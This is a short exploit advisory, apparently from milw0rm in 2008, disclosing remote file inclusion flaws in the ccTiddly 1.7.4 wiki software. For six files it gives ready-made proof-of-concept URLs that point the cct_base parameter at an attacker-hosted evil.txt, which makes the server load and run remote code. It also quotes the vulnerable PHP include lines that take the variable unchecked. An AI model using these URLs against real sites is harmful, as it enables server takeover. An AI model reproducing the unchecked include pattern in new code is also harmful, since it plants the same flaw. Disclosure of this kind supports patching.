ccTiddly 1.7.4 - 'cct_base' Remote File Inclusion

/*

	$Id: cctiddly-1.7.4-rfi.txt,v 0.1 2008/12/04 04:12:20 cOndemned Exp $

	ccTiddly 1.7.4 (cct_base) Multiple Remote File Inclusion Vulnerabilities
	found by cOndemned
	
	download from : http://tiddlywiki.org/ccTiddly/ccTiddly_v1.7.4.zip
	
	Probably prior versions are vulnerable too...

	Greetz: ZaBeaTy, str0ke, TBH, Avantura

*/


0x01 :
	file : 
		/index.php
	poc : 
		http://[host]/[cctiddly_path]/index.php?cct_base=http://[attacker]/evil.txt?
	source :  

		18.	//includes
		19.	if(!isset($cct_base))
		20.		$cct_base = "";
		21.
		22.	include_once($cct_base."includes/header.php");
		23.	include_once($cct_base."includes/login.php");	
	
0x02 :

	file :
		/handle/proxy.php
	poc :
		http://[host]/[cctiddly_path]/handle/proxy.php?cct_base=http://[attacker]/evil.txt?
	source :

		3.	if(!isset($cct_base)) 
		4.		$cct_base= "../";
		5.	include_once($cct_base."includes/header.php");
		6.	include_once($cct_base."includes/config.php");

0x03 :

	file :
		/includes/header.php
	poc :
		http://[host]/[cctiddly_path]/handle/includes/header.php?cct_base=http://[attacker]/evil.txt?
	source :

		5.	if(!isset($cct_base)) 
		6.		$cct_base= "";
		7.	include_once($cct_base."includes/functions.php");
		8.	include_once($cct_base."includes/config.php");
		9.	include_once($cct_base."includes/pluginLoader.php");
		10.	include_once($cct_base."lang/".$tiddlyCfg['pref']['language']."/language.php");
		11.	//include is used because language file is included once in config.php file
		12.	include_once($cct_base."includes/tiddler.php");
		13.	include_once($cct_base."includes/user.php");

0x04 :

	file :
		/includes/include.php
	poc :
		http://[host]/[cctiddly_path]/includes/include.php?cct_base=http://[attacker]/evil.txt?
	source :

		3.	include_once($cct_base."includes/ccAssignments.php");

0x05 :

	file :
		/includes/workspace.php	
	poc :
		http://[host]/[cctiddly_path]/includes/workspace.php?cct_base=http://[attacker]/evil.txt?
	source :
		3.	include_once($cct_base."includes/header.php");
		4.	include_once($cct_base."includes/user.php");
		5.	include_once($cct_base."includes/tiddler.php");

0x06 :

	file :
		/plugins/RSS/files/rss.php
	poc :
		http://[host]/[cctiddly_path]/plugins/RSS/files/rss.php?cct_base=http://[attacker]/evil.txt?
	source :

		3.	include_once($cct_base."includes/header.php");
		
EoF.

# milw0rm.com [2008-12-04]